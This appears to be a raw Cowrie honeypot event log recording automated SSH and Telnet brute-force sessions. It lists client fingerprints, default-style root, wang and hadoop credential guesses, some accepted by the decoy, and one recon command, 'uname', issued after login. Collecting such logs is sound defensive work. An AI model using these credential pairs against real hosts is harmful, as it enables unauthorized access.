{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:41.679235Z","src_ip":"212.227.125.160","session":"b4ae4a11d0f6"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:12:41.680417Z","src_ip":"212.227.125.160","session":"b4ae4a11d0f6"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":47526,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc30dfb7f37a","protocol":"telnet","message":"New connection: 8.222.212.69:47526 (1.2.3.4:23) [session: bc30dfb7f37a]","sensor":"my-vps","timestamp":"2025-08-28T06:12:49.590781Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46326,"dst_ip":"1.2.3.4","dst_port":23,"session":"67015bd24e2e","protocol":"telnet","message":"New connection: 212.227.125.160:46326 (1.2.3.4:23) [session: 67015bd24e2e]","sensor":"my-vps","timestamp":"2025-08-28T06:12:55.363663Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48162,"dst_ip":"1.2.3.4","dst_port":22,"session":"798fa17f86d2","protocol":"ssh","message":"New connection: 212.227.235.229:48162 (1.2.3.4:22) [session: 798fa17f86d2]","sensor":"my-vps","timestamp":"2025-08-28T06:13:02.212121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:02.213237Z","src_ip":"212.227.235.229","session":"798fa17f86d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33080,"dst_ip":"1.2.3.4","dst_port":22,"session":"63f9692c450f","protocol":"ssh","message":"New connection: 212.227.235.229:33080 (1.2.3.4:22) [session: 63f9692c450f]","sensor":"my-vps","timestamp":"2025-08-28T06:13:02.321889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:02.322997Z","src_ip":"212.227.235.229","session":"63f9692c450f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:02.358158Z","src_ip":"212.227.235.229","session":"798fa17f86d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:02.468151Z","src_ip":"212.227.235.229","session":"63f9692c450f"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:13:02.792495Z","src_ip":"212.227.235.229","session":"798fa17f86d2"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:13:02.907501Z","src_ip":"212.227.235.229","session":"63f9692c450f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:13:03.157831Z","src_ip":"212.227.235.229","session":"798fa17f86d2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:13:03.158738Z","src_ip":"212.227.235.229","session":"798fa17f86d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:13:03.216927Z","src_ip":"212.227.235.229","session":"63f9692c450f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:13:03.217683Z","src_ip":"212.227.235.229","session":"63f9692c450f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:03.312110Z","src_ip":"212.227.235.229","session":"798fa17f86d2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:03.313351Z","src_ip":"212.227.235.229","session":"798fa17f86d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:03.368094Z","src_ip":"212.227.235.229","session":"63f9692c450f"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:03.369249Z","src_ip":"212.227.235.229","session":"63f9692c450f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46890,"dst_ip":"1.2.3.4","dst_port":22,"session":"104c00474d4f","protocol":"ssh","message":"New connection: 212.227.125.160:46890 (1.2.3.4:22) [session: 104c00474d4f]","sensor":"my-vps","timestamp":"2025-08-28T06:13:10.190403Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:10.191195Z","src_ip":"212.227.125.160","session":"104c00474d4f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:10.294957Z","src_ip":"212.227.125.160","session":"104c00474d4f"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:13:10.631661Z","src_ip":"212.227.125.160","session":"104c00474d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:13:10.923094Z","src_ip":"212.227.125.160","session":"104c00474d4f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:13:10.923770Z","src_ip":"212.227.125.160","session":"104c00474d4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:11.041956Z","src_ip":"212.227.125.160","session":"104c00474d4f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:11.043085Z","src_ip":"212.227.125.160","session":"104c00474d4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41588,"dst_ip":"1.2.3.4","dst_port":22,"session":"d36ed2fba651","protocol":"ssh","message":"New connection: 212.227.235.229:41588 (1.2.3.4:22) [session: d36ed2fba651]","sensor":"my-vps","timestamp":"2025-08-28T06:13:16.883157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:16.884052Z","src_ip":"212.227.235.229","session":"d36ed2fba651"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:17.027963Z","src_ip":"212.227.235.229","session":"d36ed2fba651"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:13:17.462094Z","src_ip":"212.227.235.229","session":"d36ed2fba651"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:13:17.830383Z","src_ip":"212.227.235.229","session":"d36ed2fba651"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:13:17.831093Z","src_ip":"212.227.235.229","session":"d36ed2fba651"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:17.976480Z","src_ip":"212.227.235.229","session":"d36ed2fba651"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:17.977578Z","src_ip":"212.227.235.229","session":"d36ed2fba651"}
{"eventid":"cowrie.session.closed","duration":30.794034719467163,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:20.384743Z","src_ip":"8.222.212.69","session":"bc30dfb7f37a"}
{"eventid":"cowrie.session.closed","duration":34.85961842536926,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:30.223216Z","src_ip":"212.227.125.160","session":"67015bd24e2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56000,"dst_ip":"1.2.3.4","dst_port":23,"session":"380c1eb30e2d","protocol":"telnet","message":"New connection: 212.227.235.229:56000 (1.2.3.4:23) [session: 380c1eb30e2d]","sensor":"my-vps","timestamp":"2025-08-28T06:13:31.037707Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56796,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a00f83dce98","protocol":"ssh","message":"New connection: 212.227.125.160:56796 (1.2.3.4:22) [session: 6a00f83dce98]","sensor":"my-vps","timestamp":"2025-08-28T06:13:31.438653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:31.439318Z","src_ip":"212.227.125.160","session":"6a00f83dce98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:31.543516Z","src_ip":"212.227.125.160","session":"6a00f83dce98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44980,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f4c17be1de5","protocol":"ssh","message":"New connection: 212.227.235.229:44980 (1.2.3.4:22) [session: 1f4c17be1de5]","sensor":"my-vps","timestamp":"2025-08-28T06:13:31.736072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:31.736967Z","src_ip":"212.227.235.229","session":"1f4c17be1de5"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:13:31.855715Z","src_ip":"212.227.125.160","session":"6a00f83dce98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:31.879798Z","src_ip":"212.227.235.229","session":"1f4c17be1de5"}
{"eventid":"cowrie.login.failed","username":"wang","password":"123456","message":"login attempt [wang/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:13:32.313062Z","src_ip":"212.227.235.229","session":"1f4c17be1de5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:32.970591Z","src_ip":"212.227.125.160","session":"6a00f83dce98"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:13:33.457967Z","src_ip":"212.227.235.229","session":"1f4c17be1de5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56260,"dst_ip":"1.2.3.4","dst_port":22,"session":"157b60105237","protocol":"ssh","message":"New connection: 212.227.125.160:56260 (1.2.3.4:22) [session: 157b60105237]","sensor":"my-vps","timestamp":"2025-08-28T06:13:37.448215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:37.448950Z","src_ip":"212.227.125.160","session":"157b60105237"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T06:13:37.671802Z","src_ip":"212.227.125.160","session":"157b60105237"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52112,"dst_ip":"1.2.3.4","dst_port":22,"session":"098036f5bdd8","protocol":"ssh","message":"New connection: 212.227.125.160:52112 (1.2.3.4:22) [session: 098036f5bdd8]","sensor":"my-vps","timestamp":"2025-08-28T06:13:39.327812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:13:39.351898Z","src_ip":"212.227.125.160","session":"098036f5bdd8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:13:39.438348Z","src_ip":"212.227.125.160","session":"098036f5bdd8"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:13:39.852100Z","src_ip":"212.227.125.160","session":"098036f5bdd8"}
